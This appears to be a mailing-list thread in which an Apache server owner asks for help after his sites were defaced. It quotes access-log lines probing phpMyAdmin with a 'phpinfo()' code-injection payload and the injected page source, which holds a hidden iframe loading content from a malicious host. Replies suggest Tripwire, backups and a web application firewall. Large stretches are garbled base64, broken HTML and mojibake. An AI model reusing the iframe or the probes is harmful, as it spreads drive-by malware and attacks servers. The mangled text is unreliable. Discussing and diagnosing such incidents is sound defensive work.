218.8.251.187 - - [02/Ap=
r/2010:13:44:22 -0500] "GET //myadmin/config/config.inc.php?p=3Dphpinf=
o(); HTTP/1.1" 404 675 "-" "Mozilla/4.0 (compatible; MS=
IE 6.0;

218.8.251.187 - - [02/Ap=
r/2010:13:44:22 -0500] "GET //PHPMYADMIN/config/config.inc.php?p=3Dphp=
info(); HTTP/1.1" 404 675 "-" "Mozilla/4.0 (compatible;=
MSIE 6.

218.8.251.187 - - [02/Ap=
r/2010:13:44:23 -0500] "GET //phpMyAdmin/config/config.inc.php?p=3Dphp=
info(); HTTP/1.1" 404 675 "-" "Mozilla/4.0 (compatible;=
MSIE 6.

218.8.251.187 - - [02/Ap=
r/2010:13:44:24 -0500] "GET //p/m/a/config/config.inc.php?p=3Dphpinfo(=
); HTTP/1.1" 404 675 "-" "Mozilla/4.0 (compatible; MSIE=
6.0; Wi

So, I suspect that the vulnerablity might have been in the phpmyadmin. =
Could it be there? Or is the chaler was trying to find the most common ways=
to get in?

Oleg.

On Sun, Apr 4, 2=
010 at 3:28 AM, Morgan Gangwere < ractalus@gmail.com">0.fractalus@gmail.com> wrote:

204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
>On 4/3/2010 4:24 PM, Oleg Goryunov wrote:

204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">

THe problem is that I do not see any files changed on the server (and

thus cannot check the owner of them). Where should I look for the

possible evidence of someone else being there?

Do you have Tripwire installed?

If so, just look at its logs :)

Otherwise, I'd look carefully at the dates that things were modified. y=
ou *do* have backups, right?

--

Morgan Gangwere

>> Why?

> Because it breaks the logical flow of conversation, plus makes message=
s unreadable.

>>> Top-Posting is evil.
<=
br>

------------------------------------------------------------ ---------

The official User-To-User support forum of the Apache HTTP Server Project.<=
br>
See <URL: lank">http://httpd.apache.org/userslist.html> for more info.

To unsubscribe, e-mail: g" target=3D"_blank">users-unsubscribe@httpd.apache.org

=A0" =A0 from the digest: httpd.apache.org" target=3D"_blank">users-digest-unsubscribe@httpd.apache.o=
rg

For additional commands, e-mail: org" target=3D"_blank">users-help@httpd.apache.org

--0015174bf05c3c57ab048365347a--

Re: Someone hacked my apache2 server

am 04.04.2010 10:43:43 von Oleg Goryunov

--00151747be44ebd43b04836536c4
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: base64

SSdtIGFmcmFpZCBJIGRvIG5vdCBoYXZlIFdBRi4uLgpPbGVnLgoKT24gU3Vu LCBBcHIgNCwgMjAx
MCBhdCA2OjU1IEFNLCBHaWwgVmlkYWxzIDxndmlkYWxzQGdtYWlsLmNvbT4g d3JvdGU6Cgo+IE9s
ZWcsCj4KPiBXaGF0IGtpbmQgb2Ygd2ViIGFwcGxpY2F0aW9uIGZpcmV3YWxs IChXQUYpIGFyZSB5
b3UgcnVubmluZyBvbiB5b3VyIHdlYgo+IHNlcnZlcnM/IElmIHRoZSBhbnN3 ZXIgaXMgIm5vbmUi
LCB0aGVuIHlvdSB3aWxsIGhhdmUgbWFueSBwcm9ibGVtcyB3aXRoCj4gbWFs d2FyZSBhbmQgaGFj
a2Vycy4gIFlvdSBtdXN0IGhhdmUgcHJvcGVyIHNlY3VyaXR5LiBHb29nbGUg Im1vZF9zZWN1cml0
eSIKPiBvciBoaXJlIGEgd2ViIHNlY3VyaXR5IGd1eSB0byB0YWtlIGNhcmUg b2YgeW91ciBzZXJ2
ZXJzIGZvciB5b3UuCj4KPiBHaWwgVmlkYWxzCj4gd3d3LnZtcmFja3MuY29t Cj4KPgo+IE9uIFNh
dCwgQXByIDMsIDIwMTAgYXQgMjoyMCBQTSwgT2xlZyBHb3J5dW5vdiA8b2xl Zy5nb3J5dW5vdkBn
bWFpbC5jb20+d3JvdGU6Cj4KPj4gSGVsbG8gYWxsLAo+PiBJdCBsb29rcyBs aWtlIHNvbWVvbmUg
aGFja2VkIG15IGFwYWNoZTIgc2VydmVyIGFuZCBJIGFtIHRyeWluZyB0bwo+ PiB1bmRlcnN0YW5k
IGhvdyB0aGlzIGNvdWxkIGhhdmUgaGFwcGVuZWQuCj4+IFRoaXMgaXMgd2hh dCBoYXBwZW5lZDoK
Pj4gQWxsIG9mIGEgc3VkZGVuIHRoZSBzZXJ2ZXIgLSBpbiByZXNwb25zZSB0 byBhIHdlYi1icm93
c2VyIHJlcXVlc3QgZm9yIGEKPj4gcGFnZSAtIHN0YXJ0ZWQgdG8gZ2l2ZSBh IGZ1bGwgc2NyZWVu
IG9mIHVua25vd24gY2hhcmFjdGVycyAobG9va2VkIGxpa2UgYQo+PiBsb25n IHRleHQgd2l0aCBl
bmNvZGluZyBtaXNtYXRjaCkuCj4+IFRoZSBvdXRwdXQgd2FzIGltbWVkaWF0 ZSBhbmQgdGhlIHNh
bWUgZm9yIGFsbCB0aGUgd2ViLXNpdGVzIGxvY2F0ZWQgb24gdGhlCj4+IHNl cnZlci4KPj4gTG9v
a2luZyBhdCB0aGUgcGFnZSBzb3VyY2Ugb2YgdGhlIG91dHB1dCBJIHNlZSB0 aGUgZm9sbG93aW5n
Ogo+PiA9PT09PT09PT0KPj4KPj4gPGlmcmFtZSBzcmM9ICBodHRwOi8vYSB6 IHMgeCBkIGUgNSA1
IC4gOSA5IDYgNiAuIG9yZzo4ODAwL2FrNDcvMjkuaHRtbAo+PiB3aWR0aD0x IGhlaWdodD0xPjwv
aWZyYW1lPiDQmyDvv73vv73vv73vv73vv73vv70g0Y1b0YFu4paIOCDilqDi lozvv73iiJogXC3i
lpF7IOKVmNCmICfilogmcSDilKRJINGJXeKVmdGE4pWlbHviiJoKPj4g0LvQ sCTilIxmQ9ChKkni
lJjRkdGBINGG0K7RhdCu0YxmKOKVqdCmIDlO4paTLdC+4pWXcNCQ4pSAIDni hJZmONCsICDQl+KV
qdCB4oia0KPRlNGD0LviloAuXtCh0JlNIOKVo8Kw0ZfRhdCr4pWr4pWfJNGI 0JTRgdCX4pS0cSDQ
rlwKPj4g0K3QoCDQrl7QreKVnCHCpG7Qn1xpKgo+Pgo+PiDilZZcSSrilKzQ geKVkuKWiNCQICBr
4pSCwqQw0KzilZBm4paM4pSY0LDQu9CHOOKVneKVkSBvINC70J/Qk8Kk4pWr 0J7QvdCc0YwmNiAg
ICAgINCe0JbQnuKWgE0q0LQ5bEHRidGP0Y3RjSDQk9CT0LPQveKImuKVmSLi laTilZvQsHJ8Cj4+
IDDilJggRyDQuT0gINCz4pWU4pWkICHilJzQmCBGJtCq0J0g0KDQouKVkOKV kVRQ4pWQ0J3QsNCh
0YnilZ4qCj4+IE3QrmVK4paIbiAg4pWR0JEp4pSC0KTRgNCgIOKImtCs0ZTR iWEgK2nQqeKUpCA7
4pWnWEDihJbilZlhYOKUmNCdCj4+IHHRgCDQmSdUIGYgczvRijzQv9GBSNCq 4paT4pScQNC7SFlT
IOKVpmXilKxu0K7QotChIELilZBaIFzilILiiJlM0YnQtDrRhNCjUtC50LBP 4pWU4paA4paEZ+KV
piDilabQvdC44pWp0Z7RjuKVq9Cb0JvRlOKVptC7IEoKPj4g0KrilojQmeKV pSDilaUgSeKVqSU3
4paR0Jog4paIbwo+Pgo+PiBI0KjQmTXiladwfSvQswo+PiBJ4pWbJyBiJ9Cc JHPQsNGFMUF9UkHQ
qCBz4pWUINClSTnQkNC0VOKVpTFL0ZHQu9CpIOKVpuKVpSBOYybQqdCn0YIg 0K9+dyB40K1nTNCi
dyrilasxI+KVnyDiiJls0JFcQjplIHkgIOKUnNGCOwo+PiDQp+KVq+KWkCxC ICEg4pWYMiAu4pWQ
IiDilaQpIOKVk13CsCAg4pWQ4pSAYWBAWTbilawt4pS00I7QkNCwIOKUlAo+ PiDQtuKUlDHilZ3R
iSBtIOKVmUJJ0K7ilJTQqeKVnyc60LVFa0DQnNCe0JFn4pWpIE7ilJxi4pag 0YEnINC2SlnQtdCU
0Yl+MtGANGFB4oSWaOKUpNCo4pWRRWrQkG0g4pSCLiZj0YfQktCpICAgICAg Y9CQcdCnYlN5Cj4+
INGM4pSsU1DQpeKUgD3ilJzQtCAgICAgICAgUuKUnCDQv0Tilowg0JbQlSBv Cj4+Cj4+ICPQpeKV
oNCR4pWQ4pWU0YvRniQg4pWYQHxIKdCnQeKVnCk3TNCvMdCp0LM5QC/ilZni laggZDhSOiU0Rn3Q
kCxMNtCsINCcbtCy0KLilJwgUyAkLtC8Tygw4pSM0JBwaOKVnuKVpCAgXNCE 4pWkbOKElgo+PiA0
I8K30KMnQy4z4pSkICAgICAg0LBNVSLilZ7QhCPQmtCROOKVkjnQpeKVmuKV pj7Qn9GFRkfRiiYg
VOKVqmrilJDRgSAgwrd+IEZa4oiZZO+/vTBLSi7RjiAgICAgIGJF4pWU0LnR jOKVnOKUvGcKPj4g
0Yw4LuKVn9C90YLQs+KUtNCz4pWlIOKUpNGJOU140KIwWdCEWdCO4paQ0YI0 0LUiINCaOTPQruKV
q9C10LclZ9C8ZNCXIGlpKOKWkTgg0J0zJeKUtNCTQ1RFINC60JZ44pSAdOKV q28gSCDRieKWiNCW
IS0g0KQKPj4gXiAgQeKUmCPQkOKVlSB0STlr0JfilpJVTuKVkW1+4pWp0Jc7 PyDQkHYgXOKVmiDi
lZ84S+KVkNGXYtCkN9CwNUM04pSC4pWjXuKWk3ozeOKWiNCfT19OY+KImdCf 0KzQrl7ilIzRiGTi
lafihJbQjmFXXnx4Cj4+INCv0L/ilLzQktGPSTJg4pWc4pWc4pS0bm930Z7i lJgo4pSM4pSY4paQ
0YnRjyTilZReINGNIOKVouKImuKVlNCSSyDQsdCWIeKUjOKVo9GUONCB0Lfi lZFXWdCl0LFTICDi
lLzQgeKWiNGPIOKWgHDQtXHQtyDQhHTRjNCTUNC70KvRlDDRitCe4oiZaGEK Pj4gOiJWINGB0LPi
lZ5pIOKVllpAIFnRnuKWoNCVWSzQoGAtIEZFNNCuYS4g0ZEg0JZ2MNC4ICDQ hyBe0I5kVNGD0Ybi
lKxB4pWsPnTilajilaHilJggINCp0JzilanQs+KVmdGU4pSCVyB90ZEr4paT IGZVWAo+PiDQl9Ge
cyAgLXfQslIgRuKWkeKImdCd4pWVNeKWkGQg4paR0KfilZvilpIKPj4KPj4K Pj4gfiDRkVkg0LLQ
oiDQsFkgdGxr0LDRh9C+0K1g4oiaLeKWhCDilLxt0YHQgeKVoCAu4paIICAg 4pWj0L3ilIzQk+KW
oHsg0YU/0YogIHXRjjRk4pWQ4pSkStCE4pWVLtGC4pWS0YkrcnF5ftCE0YvR keKVkuKWjOKVkeKW
hG0KPj4g4pWj0KwqIDM1ZXrilalh4paS0LrRgNC/0YV70YwjZdGHOtGFPl/i lLTQk9GKeCAgMcKw
L9C7MXhR0YnilZUg4pWd0LLQo9C2RdCkLCIuYNC94pWe0LNc4pWR0L3QvGEg RSdZ0IfQvtCr4pWa
4paQCj4+IC5a0YUg0JA60Y1sLtCb4paQe+KUguKUmNGO0L1g0YNS0K0g4pSA 0KwgwrBL4pWpdOKV
oNC50YgkaEgg4pSC4pWW4pWRICAt0LTilZrQqixp4pWU0KJ20K0gwqTilaEi SCDQv9GHwqTQjuKE
lsKwIEzilZZXMNCdc2PilLQgdQo+PiBSJdGKNOKVqllm4pScNeKVrOKVn9Cu 0KIsKCt50ZQ60I7Q
kyDRjCXilILilpHRiV13UiUx0ZHilKzQlS5y4pWeINGL4pWWICBZUuKImTx9 IOKWiCDRjiDQnuKV
ldC04pWlLXEg4pWWX+KVqeKVrHsyWdGF0YbilZXilZQKPj4g4pS04pSk0YnR gNCRQStR4pWW4paE
4paT0KfCsOKWkHvQl+KVl9GH0J8KPj4KPj4gd9CoQeKUvOKVo+KVk9GONFLR nnPilaBG0LfilaDi
laN74pWZIGvilZTQudGH4paROOKVm+KWhCDilqDilaLQq9CR4pScI9CV0L3Q kdGP4oSWfiBv4pWX
4pWj0KvQpNCwICYyOAo+PiBe4pWrQE990YM64pWoZiAtQdC/0LXQqiAgICAg INCm0Jwg0K7ilJhr
4pWaINC/0I7iloR70YnCt+KVnC/ilZZV0ZfQq3EkYdC50LrilZR40ITRitGM fOKVkCA1ICAx4paE
INCYINCv0ZTRhtGGfCAg4pSAd+KWhG8KPj4g0Y8gNNGD0L1j77+94pWfP+KV nmRMTSPQs3jilZZs
4pSQ4pSQSuKVluKUkNCwStCrYQo+PiDilZl2KtGH0Zc4eH520ZHRgtGNb3cr duKVqFwg0J8g4pWl
ZEohICDilILCt+KVoF8s0KrilavQqNGK0LAg4pWaS9GA0KQg0JMg0Ywq0YpZ 4pWk4pWiIHLilLzQ
vDHQoTTQnTg84pWXa2HQgeKWiEMKPj4g0ITRl9Cn0J/ilZDilavQs0fRhtGL 4pWk4paM4oiZwrci
TyDQp+KVpCDilILRlyBSX+KImlnQoC4mIHwgINCf0LZ0WNCeSMKw4pSk4pWk wqTQltCd0JBE4paE
4pSY0Jkg0Y7ilZVyIMKkCj4+Cj4+IEtWJNCnICAgICAg4pWZ0KjQu1fQnSc4 euKWktCg4paIINCW
a+KVm1lFeOKUnNGFdXBEQlLQs9CYNNCzSdC80ZQ0MnAk4pWi0KMg0K3QkyDR l8KkZuKVpiA+INCW
ID8+ICDRiydjaSDQsuKVq2kKPj4g77+90JnQudCcYdGJIH7QllYg0KJN0IEw 4pWp4pWf4pWl4pSY
ICoq0ZRB4pWeINCj4paRICNtZ0RTLtGG4oiaIHbQviAy0LHQt1gi0KzilaXQ k9CwTiAr0LHQhz7i
iJnQsdGHfiDQmDvRnkwgIE/RjD7QoXAKPj4g4pWa0LXRgtCQODzQvNCT0YzQ o+KWoCDilZcg0JzR
j27RkXw84pWo0LRf0KPiloh3P+KVp9GMOlkg4oiZbC3QmyDQuFNG4pWh0Kgg ZmEsVlfRjdCUWlfQ
kMKk0KzQky7RjdCswrBd0KUg4paE0YnRgdCc4pScCj4+Cj4+INCx0LjilZ05 0YHQuSvilaxCICBB
JiDilZQt0Kdu0LRVWOKWknV1INCyRiDQkiApT2TRhAo+PiDRgSBiNtCpINCl a0J50JrQn1Yh4pWU
0KQn4pWgIUTilpFV0KFMQSDilIDQpS8l0JDRl9GHKGTilaDilZHQm3g20Yk7 0K3Qp9C6SNC5IHPi
laNPem7QluKUnEjQo9CB0Ygg4pWq4pSkTCBT0JDQlCgKPj4g0LzQvCbilZda M052SuKVo3Ag0Yho
4pWWd+KUrF0g4pWmCj4+Cj4+ICDQoeKWjOKUtOKEluKUkCBp0Y/Rj9CQbSA0 4pSAN9GIYtC1enHi
lZFo0JrQpNCV4pSk4pWcTibilJQtCj4+ICAqWDtU0YPQnNChRNGNey7ilaNY 4pWf0LbQmlnilZPR
gCBuYmds4pWm4pWQReKUgiRTINCj4pWQ0JfRgCBxICAgICAgSyPQmjNG0LE6 4pWawrcxICDQlyDR
kXHQvl3Qn+KWiHLQkCBuOuKWgNCQ4pWoCj4+INCr4pWU0JU70Jt64pWmMOKV leKVqTXQoeKVpNCU
4pWkUuKVnCAgICAgINCrcgo+Pgo+PiDilJDQr3l5NOKUgiDilKw+4pWa0IHQ nSnilZ970JXQqSjR
hTTilZjilaggICDRhSDilqAg0KMgfNCHWTjCsHnilZZ60IfilIBAJEQgc+KE luKWktC5YuKWktC2
MdCT0L/RgeKUguKVptCQUHFf4oiZ0KPQvThxIOKVkmog4pWS4pWiCj4+IELi lZEgIOKVodGMPCDi
larRjSrQq9CT0JFlINCVa1R84pSU0Y0gLdCO77+94pS0WiDilZ3ilavilaDi loQ9IDTilZBR4pSc
4pWbQNCB4pWYIOKUlNCuItCb0J3ilLxMeNCmQeKVqtC14pWe0L0g0YbQvNCS WSDRkUrRhOKVotCq
0IfilZMKPj4g4paS4pWl0YHilZvCsNC80YnQhNGG4pWl4pWXPm5HfkNIKGQi 4pWS0JNj0JvQoNC1
wqTihJZhICDilpPilpAgIDY54pWWICAg0JBvWDt30YYg0Yts0Y3ilaFzICAg WdCYTNCoQCAgIOKV
lyDiiJpDIFrRjCDRgAo+PiAiwrDQhNCRUGPQp2EpZ9CjZdGF0LQ0TkjilJAg IC/ilZAhY9Ch0JTQ
tdCg4pSkINC54pWU0LPQpEPRiiAuOSvRlNCr4pSQ4pWqICAgICAg0YQ1WCDR gCA2PNGH4paS4pS8
77+90Kok4pWo0YLilaXilpLQmNCh0ITilaXihJZ1Cj4+IOKVnmHQnHTQhNCl XtCBVz9L0Z7ilZYy
INC50LzQo9GA4pWTNNCgIEUKPj4KPj4gPT09PT09PT09PT09PT09PT09Cj4+ IFRoZSBhZGRyZXNz
IGluZGljYXRlZCBpbiB0aGUgYmVnaW5pbmcgb2YgdGhlIHBhZ2UgY29kZSBs ZWFkcyB0byBzb21l
Cj4+IGNoaW5lc2Ugc2VydmVyLgo+Pgo+Pgo+PiBTbywgc29tZWhvdyBpdCBo YXBwZW5lZCB0aGF0
IHRoZSBvdXRwdXQgb2YgdGhlIGFwYWNoZSBzZXJ2ZXIgd2FzCj4+IHN1YnN0 aXR1dGVkIGJ5IHRo
aXMgcGFnZSwgd2hpY2ggcmVkaXJlY3RlZCB2aXNpdG9ycyB0byBzb21lIGNo aW5lc2Ugc2VydmVy
LiBJdAo+PiBpcyB0aGUgc2Vjb25kIHRpbWUgSSBhbSBwb3N0aW5nIHRvIHRo ZSBtYWlsaW5nIGxp
c3QsIHRoZSBmaXJzdCB0aW1lIHRoZQo+PiBtYWlsaW5nIGxpc3QgdmlydXMg c2Nhbm5lciBpZGVu
dGlmaWVkIHRoZSBjb250ZW50IGFzIGhhdmluZyB0aGUKPj4gVHJvai9GdWpp Zi1HZW4gdmlydXMs
IHRodXMsIHRoaXMgdGltZSBJIHJlbW92ZWQgYWN0aXZlIGxpbmtzIGZyb20g dGhlCj4+IG1lc3Nh
Z2UgYm9keSBzbyBpdCBpcyBub3QgZXhhY3RseSB3aGF0IEkgcmVjZWl2ZWQp Lgo+Pgo+Pgo+PiBC
dXQgdGhlIG1vc3Qgc3RyYW5nZSB0aGluZyB3YXMgdGhhdCB0aGUgcHJvYmxl bSBkaXNzYXBlYXJl
ZCBpdHNlbGYhIFNvLCBpdAo+PiBsYXN0IGZvciAxMCBtaW51dGVzIHRoZW4g ZGlzYXBwZWFyZWQh
IEFuZCB0aGUgYWdhaW4gc3RhcnRlZCBhbmQgYWdhaW4KPj4gZGlzc2FwZWFy ZWQuIEZpbmFsbHks
IEkgdHVybmVkIGRvd24gYXBhY2hlIHVudGlsbCBJIHVuZGVyc3RhbmQgd2hh dCBpcyBnb2luZwo+
PiBvbi4uLgo+Pgo+PiBBbnkgaWRlYSBob3cgY291bGQgdGhhdCBoYXBwZW4/ ICBIb3cgdG8gcmVw
cm9kdWNlIHRoaXM/IEhvdyB0byBwcmV2ZW50Pwo+PiBXaGVyZSB0byBsb29r IGZvciBsb2dzPyBJ
IGhhdmUgY2hlY2sgYm90aCBzc2ggbG9ncyBhbmQgYXBhY2hlIGxvZ3MsIHRo ZXJlCj4+IGlzIG5v
dGhpbmcgdGhhdCBjb3VsZCBzZWVtIHVudXN1YWwgdGhlcmUuLi4KPj4KPj4g QW55IGhlbHAgaXMg
YXBwcmVjaWF0ZWQuCj4+IE9sZWcuCj4+Cj4+Cj4K
--00151747be44ebd43b04836536c4
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

I'm afraid I do not have WAF...
Oleg.

te">On Sun, Apr 4, 2010 at 6:55 AM, Gil Vidals < f=3D"mailto:gvidals@gmail.com">gvidals@gmail.com> wrote:
<=
blockquote class=3D"gmail_quote" style=3D"border-left: 1px solid rgb(204, 2=
04, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">

Oleg,

Gil Vidals

target=3D"_blank">www.vmracks.com

On Sat, Apr 3, 2010 at 2:20 PM, Oleg Goryun=
ov < =3D"_blank">oleg.goryunov@gmail.com> wrote:

204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">

>Hello all,

It looks like someone hacked my apache2 server and I am trying to understan=
d
how this could have happened.

This is what happened:

All of a sudden the server - in response to a web-browser request for a pag=
e -
started to give a full screen of unknown characters (looked like a long tex=
t
with encoding mismatch).

The output was immediate and the same for all the web-sites located on the
server.

Looking at the page source of the output I see the following:

=========3D

ourier;"><iframe
src=3DÂ http://a a>
z s x d e 5 5 . 9 9 6 6 . org:8800/ak47/29.html width=3D1
height=3D1></iframe> amily: "Times New Roman";">Ð 10pt; font-family: Courier;"> family: "Menlo Regular";">ï¿½ï¿½ï¿½ï¿½=EF=
¿½ï¿=BD "> n";">Ñ ;">[ an";">Ñ r;">n man";">â=88 urier;">8 ew Roman";">â â ont-family: "Menlo Regular";">ï¿=BD -size: 10pt; font-family: Courier;">â=9A \- size: 10pt; font-family: "Times New Roman";">â=91 n style=3D"font-size: 10pt; font-family: Courier;">{ font-size: 10pt; font-family: "Times New Roman";">âÐ=A6=
'=
=
â=88&=
;q n";">â=A4 ier;">I Roman";">Ñ urier;">] w Roman";">âÑâ¥ pt; font-family: Courier;">l{â=9A ; font-family: "Times New Roman";">Ð»Ð° =3D"font-size: 10pt; font-family: Courier;">$ e: 10pt; font-family: "Times New Roman";">â=8C tyle=3D"font-size: 10pt; font-family: Courier;">fC t-size: 10pt; font-family: "Times New Roman";">Ð¡ style=3D"font-size: 10pt; font-family: Courier;">*I ont-size: 10pt; font-family: "Times New Roman";">âÑ=91=
Ñ > >ÑÐ®ÑÐ®Ñ family: Courier;">f( ot;Times New Roman";">â©Ð=A6 10pt; font-family: Courier;"> 9N -family: "Times New Roman";">â=93 size: 10pt; font-family: Courier;">- font-family: "Times New Roman";">Ð¾â=97 e=3D"font-size: 10pt; font-family: Courier;">p ze: 10pt; font-family: "Times New Roman";">Ðâ=80=
9â=96f8=
=
Ð¬=
Â es New Roman";">Ðâ©Ð=81 10pt; font-family: Courier;">â=9A ; font-family: "Times New Roman";">Ð£ÑÑÐ»â=
=80.^<=
span style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ð¡ÐM=
quot;;">â=A3 r;">Â° ew Roman";">ÑÑÐ«â«â font-size: 10pt; font-family: Courier;">$ 0pt; font-family: "Times New Roman";">ÑÐÑÐ=E2=
´q n> ">Ð®\ an> ;">ÐÐ "> n";">Ð® ;">^ an";">Ðâ=9C y: Courier;">!Â¤n uot;Times New Roman";">Ð nt-family: Courier;">\i*

Â

w Roman";">â=96 : Courier;">\I* mes New Roman";">â¬ÐââÐ=90 tyle=3D"font-size: 10pt; font-family: Courier;">Â k > >â=82=C2=
=A40 an";">Ð¬â=90 y: Courier;">f es New Roman";">ââÐ°Ð»Ð =3D"font-size: 10pt; font-family: Courier;">8 e: 10pt; font-family: "Times New Roman";">ââ n> o yle=3D"font-size: 10pt; font-family: "Times New Roman";">Ð»=
ÐÐ=
Â¤ oman";">â«ÐÐ½ÐÑ=8C ze: 10pt; font-family: Courier;">&6Â Â Â Â Â =
Roman";">ÐÐÐâ=80 10pt; font-family: Courier;">M* family: "Times New Roman";">Ð´ : 10pt; font-family: Courier;">9lA nt-family: "Times New Roman";">ÑÑÑÑ an style=3D"font-size: 10pt; font-family: Courier;"> font-size: 10pt; font-family: "Times New Roman";">ÐÐ=D0=
³Ð=BD=E2=
oman";">â=99 ourier;">" mes New Roman";">â¤âÐ° ze: 10pt; font-family: Courier;">r| 0 font-family: "Times New Roman";">â=98 font-size: 10pt; font-family: Courier;"> G 10pt; font-family: "Times New Roman";">Ð¹ =3D"font-size: 10pt; font-family: Courier;">=3DÂ <=
span style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ð³ââ¤ Courier;"> ! s New Roman";">âÐ=98 ont-family: Courier;"> F& mily: "Times New Roman";">ÐªÐ size: 10pt; font-family: Courier;"> font-family: "Times New Roman";">Ð Ð¢ââ span>TP style=3D"font-size: 10pt; font-family: "Times New Roman";">â=
ÐÐ°Ð¡Ñâ font-family: Courier;">*

M quot;;">Ð® >eJ n";">â=88 ier;">nÂ ly: "Times New Roman";">âÐ=91 -size: 10pt; font-family: Courier;">) font-family: "Times New Roman";">âÐ¤ÑÐ=A0 an> â=9A=
=
Ð¬ÑÑ er;">a +i w Roman";">Ð©â=A4 family: Courier;"> ; ot;Times New Roman";">â=A7 font-family: Courier;">X@â=96 nt-family: "Times New Roman";">â=99 t-size: 10pt; font-family: Courier;">a` t; font-family: "Times New Roman";">âÐ=9D tyle=3D"font-size: 10pt; font-family: Courier;">

q quot;;">Ñ > ";">Ð ">'T f
s; ";">Ñ ">< oman";">Ð¿Ñ : Courier;">H s New Roman";">Ðªââ : 10pt; font-family: Courier;">@ -family: "Times New Roman";">Ð» e: 10pt; font-family: Courier;">HYS font-family: "Times New Roman";">â=A6 ont-size: 10pt; font-family: Courier;">e pt; font-family: "Times New Roman";">â =3D"font-size: 10pt; font-family: Courier;">n e: 10pt; font-family: "Times New Roman";">Ð®Ð¢Ð¡ n> B le=3D"font-size: 10pt; font-family: "Times New Roman";">â=90=
Z \ an style=3D"font-size: 10pt; font-family: "Times New Roman";">=E2=
â=
=99L an";">ÑÐ´ Courier;">: New Roman";">ÑÐ£ amily: Courier;">R ;Times New Roman";">Ð¹Ð° font-family: Courier;">O : "Times New Roman";">âââ=84 le=3D"font-size: 10pt; font-family: Courier;">g ize: 10pt; font-family: "Times New Roman";">â=A6 style=3D"font-size: 10pt; font-family: Courier;"> nt-size: 10pt; font-family: "Times New Roman";">â¦Ð=BD=
Ð¸â©ÑÑâ«ÐÐÑâ ¦Ð=BB > J e=3D"font-size: 10pt; font-family: "Times New Roman";">Ðª=E2=
Ðâ=A5 urier;"> w Roman";">â=A5 : Courier;"> I es New Roman";">â=A9 amily: Courier;">%7 t;Times New Roman";">âÐ=9A 0pt; font-family: Courier;"> mily: "Times New Roman";">â=88 e: 10pt; font-family: Courier;">o

Â

H quot;;">Ð¨Ð rier;">5 Roman";">â=A7 Courier;">p}+ es New Roman";">Ð³ ly: Courier;">

I quot;;">â=9B r;">' b' imes New Roman";">Ð mily: Courier;">$s ;Times New Roman";">Ð°Ñ font-family: Courier;">1A}RA mily: "Times New Roman";">Ð¨ 10pt; font-family: Courier;"> s family: "Times New Roman";">â=94 ize: 10pt; font-family: Courier;"> ont-family: "Times New Roman";">Ð¥ size: 10pt; font-family: Courier;">I9 font-family: "Times New Roman";">ÐÐ´ =3D"font-size: 10pt; font-family: Courier;">T e: 10pt; font-family: "Times New Roman";">â=A5 tyle=3D"font-size: 10pt; font-family: Courier;">1K t-size: 10pt; font-family: "Times New Roman";">ÑÐ»Ð©=
style=3D"font-size: 10pt; font-family: "Times New Roman";">=E2=
¦â=A5 ">
Nc& Roman";">Ð©Ð§Ñ -family: Courier;"> ot;Times New Roman";">Ð¯ t-family: Courier;">~w x "Times New Roman";">Ð font-family: Courier;">gL y: "Times New Roman";">Ð¢ t; font-family: Courier;">w* ily: "Times New Roman";">â=AB : 10pt; font-family: Courier;">1# t-family: "Times New Roman";">â=9F -size: 10pt; font-family: Courier;"> â=99l ize: 10pt; font-family: "Times New Roman";">Ð yle=3D"font-size: 10pt; font-family: Courier;">\B:e
yÂ uot;Times New Roman";">âÑ=82 10pt; font-family: Courier;"> ; t-family: "Times New Roman";">Ð§â«â n style=3D"font-size: 10pt; font-family: Courier;">,B ! =3D"font-size: 10pt; font-family: "Times New Roman";">â=98 span>2 . style=3D"font-size: 10pt; font-family: "Times New Roman";">=E2=
" =
uot;;">â=A4 ;">) man";">â=93 urier;">]Â°Â ont-family: "Times New Roman";">ââ yle=3D"font-size: 10pt; font-family: Courier;">a`@Y6 ont-size: 10pt; font-family: "Times New Roman";">â=
- =3D"font-size: 10pt; font-family: "Times New Roman";">â=B4=
ÐÐÐ° er;"> oman";">â=94 ourier;">

uot;;">Ð¶â=94 ourier;">1 ew Roman";">âÑ=89 -family: Courier;"> m quot;Times New Roman";">â=99 ; font-family: Courier;">BI ly: "Times New Roman";">Ð®âÐ©â n style=3D"font-size: 10pt; font-family: Courier;">': =3D"font-size: 10pt; font-family: "Times New Roman";">Ðµ n>Ek@ yle=3D"font-size: 10pt; font-family: "Times New Roman";">Ð=
ÐÐg=
uot;;">â=A9 ;"> N man";">â=9C urier;">b w Roman";">â Ñ=81 family: Courier;">' "Times New Roman";">Ð¶ font-family: Courier;">JY y: "Times New Roman";">ÐµÐÑ nt-size: 10pt; font-family: Courier;">~2 pt; font-family: "Times New Roman";">Ñ font-size: 10pt; font-family: Courier;">4aAâ=96h font-size: 10pt; font-family: "Times New Roman";">â¤Ð=A8=
â=91Ej span> t;;">Ðm =
uot;;">â=82 ;">.&c ew Roman";">ÑÐÐ© ont-family: Courier;">Â Â Â Â Â c<=
span style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ðq > >Ð§ bSy span> t;;">Ñâ rier;">SP w Roman";">Ð¥â=80 family: Courier;">=3D uot;Times New Roman";">âÐ=B4 10pt; font-family: Courier;"> Â Â Â Â Â =
Â R ot;Times New Roman";">â=9C font-family: Courier;"> "Times New Roman";">Ð¿ font-family: Courier;">D : "Times New Roman";">â=8C 0pt; font-family: Courier;"> mily: "Times New Roman";">ÐÐ size: 10pt; font-family: Courier;"> o

Â

# quot;;">Ð¥â ÐââÑÑ=9E le=3D"font-size: 10pt; font-family: Courier;">$ size: 10pt; font-family: "Times New Roman";">â=98 n style=3D"font-size: 10pt; font-family: Courier;">@|H) =3D"font-size: 10pt; font-family: "Times New Roman";">Ð§ n>A e=3D"font-size: 10pt; font-family: "Times New Roman";">â=9C<=
/span>)7L n style=3D"font-size: 10pt; font-family: "Times New Roman";">=D0=
=AF1 pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ð©Ð³9=
